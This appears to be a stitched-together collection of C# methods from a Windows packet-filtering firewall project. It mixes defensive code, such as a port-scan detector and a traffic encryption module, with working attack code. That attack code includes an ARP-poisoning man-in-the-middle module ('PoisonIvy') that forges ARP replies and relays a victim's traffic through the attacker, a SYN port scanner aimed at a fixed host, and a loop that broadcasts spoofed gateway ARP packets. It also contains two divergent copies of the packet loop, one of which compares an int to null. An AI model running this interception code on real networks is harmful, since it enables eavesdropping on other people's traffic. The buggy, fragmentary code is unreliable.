/// <summary> /// Generate and return an ARP packet /// </summary> /// <param name="from">The FROM address to be used in the ARP layer (user)</param> /// <param name="to">The TO address (gateway)</param> /// <param name="mFrom">The MAC address of the user (or attacker)</param> /// <param name="mTo">The MAC address of the gateway</param> /// <returns></returns> private ARPPacket generateARP(IPAddress from, IPAddress to, PhysicalAddress mFrom, PhysicalAddress mTo) { // build the ethernet layer packet EthPacket eth = new EthPacket(42); eth.FromMac = mFrom.GetAddressBytes(); eth.ToMac = mTo.GetAddressBytes(); eth.Proto = new byte[2] { 0x08, 0x06 }; // build the arp ARPPacket arp = new ARPPacket(eth); arp.HardwareSize = 6; arp.HardwareType = 1; arp.ProtocolType = 0x0800; arp.ProtocolSize = 4; arp.ASenderIP = from; arp.ATargetIP = to; arp.ASenderMac = mFrom.GetAddressBytes(); arp.ATargetMac = mTo.GetAddressBytes(); arp.Outbound = true; arp.ProtocolSize = 0x04; // mark it REPLY arp.ARPOpcode = 2; return(arp); }
public PacketStatus GetStatus(Packet pkt) { EthPacket epkt = (EthPacket)pkt; if (pkt.Outbound && (direction & Direction.OUT) == Direction.OUT) { if (mac == null || Utility.ByteArrayEq(mac, epkt.ToMac)) { if (log) { message = "packet from " + new PhysicalAddress(epkt.FromMac).ToString() + " to " + new PhysicalAddress(epkt.ToMac).ToString(); } return(ps); } } else if (!pkt.Outbound && (direction & Direction.IN) == Direction.IN) { if (mac == null || Utility.ByteArrayEq(mac, epkt.FromMac)) { if (log) { message = "packet from " + new PhysicalAddress(epkt.FromMac).ToString() + " to " + new PhysicalAddress(epkt.ToMac).ToString(); } return(ps); } } return(PacketStatus.UNDETERMINED); }
void ScanThread() { for (int x = 0; x < ushort.MaxValue; x++) { EthPacket e = new EthPacket(60); e.FromMac = adapter.InterfaceInformation.GetPhysicalAddress().GetAddressBytes(); e.ToMac = PhysicalAddress.Parse("080027465EDE").GetAddressBytes(); e.Proto = new byte[2] { 0x08, 0x00 }; IPPacket ip = new IPPacket(e); ip.DestIP = IPAddress.Parse("192.168.1.4"); ip.SourceIP = IPAddress.Parse("192.168.1.3"); ip.NextProtocol = 0x06; ip.TotalLength = 40; ip.HeaderChecksum = ip.GenerateIPChecksum; TCPPacket tcp = new TCPPacket(ip); tcp.SourcePort = (ushort)new Random().Next(65534); tcp.DestPort = (ushort)x; tcp.SequenceNumber = (uint)new Random().Next(); tcp.AckNumber = 0; tcp.WindowSize = 8192; tcp.SYN = true; tcp.Checksum = tcp.GenerateChecksum; tcp.Outbound = true; adapter.SendPacket(tcp); Thread.Sleep(1); } }
public void threadMain() { while (true) { if (Enabled) { EthPacket ep = new EthPacket(42); ep.FromMac = PhysicalAddress.Parse("F07BCB8F7AC5").GetAddressBytes(); ep.ToMac = PhysicalAddress.Parse("FFFFFFFFFFFF").GetAddressBytes(); ep.Proto = new byte[2] { 0x08, 0x06 }; ARPPacket arpp = new ARPPacket(ep); arpp.ASenderMac = ep.FromMac; arpp.ASenderIP = IPAddress.Parse("192.168.0.1"); arpp.ATargetMac = ep.ToMac; arpp.ATargetIP = IPAddress.Parse("192.168.0.255"); adapter.SendPacket(arpp); } Thread.Sleep(1000); } }
public unsafe override PacketMainReturn interiorMain(ref Packet in_packet) { lock (padlock) { if (theirMac == null) { return(null); } EthPacket e = (EthPacket)in_packet; if ((e.Proto[0] & 0x01) == 0x01 && (CompareMac(theirMac, e.FromMac) && CompareMac(myMac, e.ToMac) || (CompareMac(theirMac, e.ToMac) && CompareMac(myMac, e.FromMac)))) { INTERMEDIATE_BUFFER *IB = e.IB; rc4.SetKeyState(key); INTERMEDIATE_BUFFER *iba = (INTERMEDIATE_BUFFER *)Marshal.AllocHGlobal(Marshal.SizeOf(new INTERMEDIATE_BUFFER())); iba->m_dwDeviceFlags = IB->m_dwDeviceFlags; iba->m_Flags = IB->m_Flags; iba->m_Length = IB->m_Length; iba->m_qLink = IB->m_qLink; for (int x = 12; x < IB->m_Length; x++) { iba->m_IBuffer[x] = (byte)(IB->m_IBuffer[x] ^ rc4.Next()); } EthPacket nPacket = new EthPacket(iba); nPacket.FromMac = e.FromMac; nPacket.ToMac = e.ToMac; nPacket.Proto = new byte[2]; nPacket.Proto[0] = (byte)(0xFE & e.Proto[0]); nPacket.Proto[1] = e.Proto[1]; adapter.ProcessPacket(nPacket); return(new PacketMainReturn("SimpleMacEncryption") { returnType = PacketMainReturnType.Drop }); } } return(null); }
unsafe void ProcessLoop() { // Allocate and initialize packet structures ETH_REQUEST Request = new ETH_REQUEST(); INTERMEDIATE_BUFFER PacketBuffer = new INTERMEDIATE_BUFFER(); IntPtr PacketBufferIntPtr = Marshal.AllocHGlobal(Marshal.SizeOf(PacketBuffer)); try { win32api.ZeroMemory(PacketBufferIntPtr, Marshal.SizeOf(PacketBuffer)); Request.hAdapterHandle = adapterHandle; Request.EthPacket.Buffer = PacketBufferIntPtr; modules = new ModuleList(this); modules.LoadExternalModules(); modules.UpdateModuleOrder(); string folder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); folder = folder + System.IO.Path.DirectorySeparatorChar + "firebwall"; if (!System.IO.Directory.Exists(folder)) { System.IO.Directory.CreateDirectory(folder); } folder = folder + System.IO.Path.DirectorySeparatorChar + "pcapLogs"; if (!System.IO.Directory.Exists(folder)) { System.IO.Directory.CreateDirectory(folder); } string f = folder + System.IO.Path.DirectorySeparatorChar + "blocked-" + this.InterfaceInformation.Name + "-" + PcapCreator.Instance.GetNewDate() + ".pcap"; pcaplog = new PcapFileWriter(f); INTERMEDIATE_BUFFER *PacketPointer; while (true) { hEvent.WaitOne(); while (Ndisapi.ReadPacket(hNdisapi, ref Request)) { PacketPointer = (INTERMEDIATE_BUFFER *)PacketBufferIntPtr; //PacketBuffer = (INTERMEDIATE_BUFFER)Marshal.PtrToStructure(PacketBufferIntPtr, typeof(INTERMEDIATE_BUFFER)); Packet pkt = new EthPacket(PacketPointer).MakeNextLayerPacket(); if (pkt.Outbound) { OutBandwidth.AddBits(pkt.Length()); } else { InBandwidth.AddBits(pkt.Length()); } bool drop = false; bool edit = false; if (enabled) { for (int x = 0; x < modules.Count; x++) { FirewallModule fm = modules.GetModule(x); PacketMainReturn pmr = fm.PacketMain(ref pkt); if (pmr == null) { continue; } if ((pmr.returnType & PacketMainReturnType.Log) == PacketMainReturnType.Log && pmr.logMessage != null) { LogCenter.Instance.Push(pmr); } if ((pmr.returnType & PacketMainReturnType.Drop) == PacketMainReturnType.Drop) { drop = true; break; } if ((pmr.returnType & PacketMainReturnType.Edited) == PacketMainReturnType.Edited) { edit = true; } } } if (!drop) { if (pkt.Outbound) { Ndisapi.SendPacketToAdapter(hNdisapi, ref Request); } else { Ndisapi.SendPacketToMstcp(hNdisapi, ref Request); } } else { pcaplog.AddPacket(pkt.Data(), (int)pkt.Length()); } } //OM NOM NOM PASTA! while (processQueue.Count != 0) { Packet pkt = processQueue.Dequeue().MakeNextLayerPacket(); if (pkt.Outbound) { OutBandwidth.AddBits(pkt.Length()); } else { InBandwidth.AddBits(pkt.Length()); } bool drop = false; bool edit = false; if (enabled) { for (int x = 0; x < modules.Count; x++) { FirewallModule fm = modules.GetModule(x); PacketMainReturn pmr = fm.PacketMain(ref pkt); if (pmr == null) { continue; } if ((pmr.returnType & PacketMainReturnType.Log) == PacketMainReturnType.Log && pmr.logMessage != null) { LogCenter.Instance.Push(pmr.Module, pmr.logMessage); } if ((pmr.returnType & PacketMainReturnType.Drop) == PacketMainReturnType.Drop) { drop = true; break; } if ((pmr.returnType & PacketMainReturnType.Edited) == PacketMainReturnType.Edited) { edit = true; } } } if (!drop) { if (pkt.Outbound) { Ndisapi.SendPacketToAdapter(hNdisapi, ref Request); } else { Ndisapi.SendPacketToMstcp(hNdisapi, ref Request); } } else { pcaplog.AddPacket(pkt.Data(), (int)pkt.Length()); } } hEvent.Reset(); } } catch (Exception tae) { Marshal.FreeHGlobal(PacketBufferIntPtr); } }
/// <summary> /// handle incoming packets /// </summary> /// <param name="in_packet"></param> /// <returns></returns> public override PacketMainReturn handlePacket(Packet in_packet) { PacketMainReturn pmr; if (isPoisoning) { if (in_packet.ContainsLayer(Protocol.Ethernet) && !(in_packet.Outbound)) { EthPacket packet = (EthPacket)in_packet; if (in_packet.ContainsLayer(Protocol.IP)) { IPPacket ip = (IPPacket)in_packet; if (ip.DestIP.Equals(GetLocalIP())) { return(null); } } // check if the packet is from our USER; if it is, rewrite the destination MAC to the // router MAC address if (new PhysicalAddress(packet.FromMac).ToString().Equals(from_mac.ToString())) { packet.ToMac = to_mac.GetAddressBytes(); packet.FromMac = local_mac.GetAddressBytes(); packet.Outbound = true; // send the packet and drop the pmr so the packet isn't processed any further adapter.SendPacket(packet); pmr = new PacketMainReturn("PoisonIvy"); pmr.returnType = PacketMainReturnType.Drop; return(pmr); } // check for the TO MAC address; if it's from our gateway, then it needs to be forwarded // to our poisoned user if (new PhysicalAddress(packet.FromMac).ToString().Equals(to_mac.ToString())) { // swap out the MAC and forward it packet.ToMac = from_mac.GetAddressBytes(); packet.FromMac = local_mac.GetAddressBytes(); packet.Outbound = true; // send the packet and drop the pmr so the packet isn't processed any further adapter.SendPacket(packet); pmr = new PacketMainReturn("PoisonIvy"); pmr.returnType = PacketMainReturnType.Drop; return(pmr); } } // repoison if we catch the FROM or TO address making ARP requests to the opposite party if (in_packet.ContainsLayer(Protocol.ARP) && !(in_packet.Outbound)) { ARPPacket request = (ARPPacket)in_packet; // if it's from our FROM ip if (request.ASenderIP.Equals(from)) { // if they're requesting the TO ip address, respond. This is a race condition! if (request.ATargetIP.Equals(to)) { System.Diagnostics.Debug.WriteLine("repoisoning USER ip " + request.ASenderIP.ToString()); for (int i = 0; i < 10; ++i) { adapter.SendPacket(generateARP(to, request.ASenderIP, local_mac, new PhysicalAddress(request.ASenderMac))); System.Threading.Thread.Sleep(500); } } } // if it's from our TO ip if (request.ASenderIP.Equals(to)) { if (request.ATargetIP.Equals(from)) { System.Diagnostics.Debug.WriteLine("repoisoning GATEWAY ip " + request.ASenderIP.ToString()); for (int i = 0; i < 10; ++i) { adapter.SendPacket(generateARP(from, to, local_mac, to_mac)); System.Threading.Thread.Sleep(500); } } } } } /// if we're waiting for a packet to come through with the FROM address IP, check if this packet is it, and if it is, /// grab the MAC and save it if (isWaitingFROM) { if (in_packet.ContainsLayer(Protocol.IP) && !(in_packet.Outbound)) { IPPacket packet = (IPPacket)in_packet; if (packet.SourceIP.Equals(from)) { from_mac = new PhysicalAddress(packet.FromMac); System.Diagnostics.Debug.WriteLine("Caught FROM MAC at: " + from_mac.ToString()); isWaitingFROM = false; } } } // likewise above with TO address if (isWaitingTO) { if (in_packet.ContainsLayer(Protocol.IP) && !(in_packet.Outbound)) { IPPacket packet = (IPPacket)in_packet; if (packet.SourceIP.Equals(to)) { to_mac = new PhysicalAddress(packet.FromMac); System.Diagnostics.Debug.WriteLine("Caught TO MAC at: " + to_mac.ToString()); isWaitingTO = false; } } } return(null); }
public override PacketMainReturn interiorMain(ref Packet in_packet) { PacketMainReturn pmr; float av = 0; if (in_packet.ContainsLayer(Protocol.TCP)) { // if we're in cloaked mode, respond with the SYN ACK // More information about this in the GUI code and help string if (data.cloaked_mode && ((TCPPacket)in_packet).SYN) { TCPPacket from = (TCPPacket)in_packet; EthPacket eth = new EthPacket(60); eth.FromMac = adapter.InterfaceInformation.GetPhysicalAddress().GetAddressBytes(); eth.ToMac = from.FromMac; eth.Proto = new byte[2] { 0x08, 0x00 }; IPPacket ip = new IPPacket(eth); ip.DestIP = from.SourceIP; ip.SourceIP = from.DestIP; ip.NextProtocol = 0x06; ip.TotalLength = 40; ip.HeaderChecksum = ip.GenerateIPChecksum; TCPPacket tcp = new TCPPacket(ip); tcp.SourcePort = from.DestPort; tcp.DestPort = from.SourcePort; tcp.SequenceNumber = (uint)new Random().Next(); tcp.AckNumber = 0; tcp.WindowSize = 8192; tcp.SYN = true; tcp.ACK = true; tcp.Checksum = tcp.GenerateChecksum; tcp.Outbound = true; adapter.SendPacket(tcp); } try { TCPPacket packet = (TCPPacket)in_packet; // if the IP is in the blockcache, then return if (data.BlockCache.ContainsKey(packet.SourceIP)) { pmr = new PacketMainReturn(this); pmr.returnType = PacketMainReturnType.Drop; return(pmr); } // checking for TTL allows us to rule out the local network // Don't check for TCP flags because we can make an educated guess that if 100+ of our ports are // fingered with a short window, we're being scanned. this will detect syn, ack, null, xmas, etc. scans. if ((!packet.Outbound) && (packet.TTL < 250)) { IPObj tmp; if (ip_table.ContainsKey(packet.SourceIP)) { tmp = (IPObj)ip_table[packet.SourceIP]; } else { tmp = new IPObj(packet.SourceIP); } // add the port to the ipobj, set the access time, and update the table tmp.addPort(packet.DestPort); tmp.time(packet.PacketTime); ip_table[packet.SourceIP] = tmp; av = tmp.getAverage(); // if they've touched more than 100 ports in less than 30 seconds and the average // packet time was less than 2s, something's wrong if (tmp.getTouchedPorts().Count >= 100 && (!tmp.Reported) && tmp.getAverage() < 2000) { pmr = new PacketMainReturn(this); pmr.returnType = PacketMainReturnType.Log | PacketMainReturnType.Allow; pmr.logMessage = string.Format("{0} touched {1} ports with an average of {2}\n", packet.SourceIP, tmp.getTouchedPorts().Count, tmp.getAverage()); // set the reported status of the IP address ip_table[packet.SourceIP].Reported = true; // add the address to the potential list of IPs and to the local SESSION-BASED list if (!data.blockImmediately) { potentials.Add(packet.SourceIP, ip_table[packet.SourceIP]); detect.addPotential(packet.SourceIP); } // else we want to block it immediately else { data.BlockCache.Add(packet.SourceIP, ip_table[packet.SourceIP]); } return(pmr); } } } catch (Exception e) { pmr = new PacketMainReturn(this); pmr.returnType = PacketMainReturnType.Log; pmr.logMessage = String.Format("{0}\n{1}\n", e.Message, e.StackTrace); return(pmr); } } // This will detect UDP knockers. typically UDP scans are slower, but are combined with SYN scans // (-sSU in nmap) so we'll be sure to check for these guys too. else if (in_packet.ContainsLayer(Protocol.UDP)) { try { UDPPacket packet = (UDPPacket)in_packet; // if the source addr is in the block cache, return if (data.BlockCache.ContainsKey(packet.SourceIP)) { pmr = new PacketMainReturn(this); pmr.returnType = PacketMainReturnType.Drop; return(pmr); } if ((!packet.Outbound) && (packet.TTL < 250) && (!packet.isDNS())) { IPObj tmp; if (ip_table.ContainsKey(packet.SourceIP)) { tmp = (IPObj)ip_table[packet.SourceIP]; } else { tmp = new IPObj(packet.SourceIP); } tmp.addPort(packet.DestPort); tmp.time(packet.PacketTime); ip_table[packet.SourceIP] = tmp; av = tmp.getAverage(); if ((tmp.getTouchedPorts().Count >= 100) && (!tmp.Reported) && (tmp.getAverage() < 2000)) { pmr = new PacketMainReturn(this); pmr.returnType = PacketMainReturnType.Log | PacketMainReturnType.Allow; pmr.logMessage = string.Format("{0} touched {1} ports with an average of {2}\n", packet.SourceIP, tmp.getTouchedPorts().Count, tmp.getAverage()); ip_table[packet.SourceIP].Reported = true; if (!data.blockImmediately) { potentials.Add(packet.SourceIP, ip_table[packet.SourceIP]); detect.addPotential(packet.SourceIP); } else { data.BlockCache.Add(packet.SourceIP, ip_table[packet.SourceIP]); } return(pmr); } } } catch (Exception e) { pmr = new PacketMainReturn(this); pmr.returnType = PacketMainReturnType.Log; pmr.logMessage = String.Format("{0}\n{1}\n", e.Message, e.StackTrace); return(pmr); } } return(null); }
public unsafe void ProcessLoop() { // Allocate and initialize packet structures ETH_REQUEST Request = new ETH_REQUEST(); INTERMEDIATE_BUFFER PacketBuffer = new INTERMEDIATE_BUFFER(); IntPtr PacketBufferIntPtr = Marshal.AllocHGlobal(Marshal.SizeOf(PacketBuffer)); try { win32api.ZeroMemory(PacketBufferIntPtr, Marshal.SizeOf(PacketBuffer)); Request.hAdapterHandle = adapterHandle; Request.EthPacket.Buffer = PacketBufferIntPtr; Modules = new ModuleList(this); Modules.LoadExternalModules(); Modules.UpdateModuleOrder(); string folder = Configuration.ConfigurationManagement.Instance.ConfigurationPath; folder = folder + System.IO.Path.DirectorySeparatorChar + "pcapLogs"; if (!System.IO.Directory.Exists(folder)) { System.IO.Directory.CreateDirectory(folder); } string f = folder + System.IO.Path.DirectorySeparatorChar + "blocked-" + inter.Name + "-" + DateTime.Now.ToBinary() + ".pcap"; pcaplog = new PcapFileWriter(f); INTERMEDIATE_BUFFER *PacketPointer; while (true) { hEvent.WaitOne(); while (Ndisapi.ReadPacket(hNdisapi, ref Request)) { PacketPointer = (INTERMEDIATE_BUFFER *)PacketBufferIntPtr; Packet pkt = new EthPacket(PacketPointer).MakeNextLayerPacket(); if (pkt.Outbound) { inter.DataOut.AddBits(pkt.Length()); } else { inter.DataIn.AddBits(pkt.Length()); } bool drop = false; bool log = false; if (this.Filtering) { for (int x = 0; x < Modules.Count; x++) { NDISModule fm = Modules.GetModule(x); int pmr = fm.PacketMain(ref pkt); if (pmr == null) { continue; } if ((pmr & (int)PacketMainReturnType.LogPacket) == (int)PacketMainReturnType.LogPacket) { log = true; } if ((pmr & (int)PacketMainReturnType.Drop) == (int)PacketMainReturnType.Drop) { drop = true; break; } } } if (!drop && !DropAll) { if (pkt.Outbound) { Ndisapi.SendPacketToAdapter(hNdisapi, ref Request); } else { Ndisapi.SendPacketToMstcp(hNdisapi, ref Request); } } if (log) { pcaplog.AddPacket(pkt.Data(), (int)pkt.Length()); } } //OM NOM NOM PASTA! while (processQueue.Count != 0) { Packet pkt = processQueue.Dequeue().MakeNextLayerPacket(); if (pkt.Outbound) { inter.DataOut.AddBits(pkt.Length()); } else { inter.DataIn.AddBits(pkt.Length()); } bool drop = false; bool log = false; if (this.Filtering) { for (int x = 0; x < Modules.Count; x++) { NDISModule fm = Modules.GetModule(x); int pmr = fm.PacketMain(ref pkt); if (pmr == 0) { continue; } if ((pmr & (int)PacketMainReturnType.LogPacket) == (int)PacketMainReturnType.LogPacket) { log = true; } if ((pmr & (int)PacketMainReturnType.Drop) == (int)PacketMainReturnType.Drop) { drop = true; break; } } } if (!drop && !DropAll) { if (pkt.Outbound) { Ndisapi.SendPacketToAdapter(hNdisapi, ref Request); } else { Ndisapi.SendPacketToMstcp(hNdisapi, ref Request); } } if (log) { pcaplog.AddPacket(pkt.Data(), (int)pkt.Length()); } } hEvent.Reset(); } } catch (Exception tae) { Marshal.FreeHGlobal(PacketBufferIntPtr); } }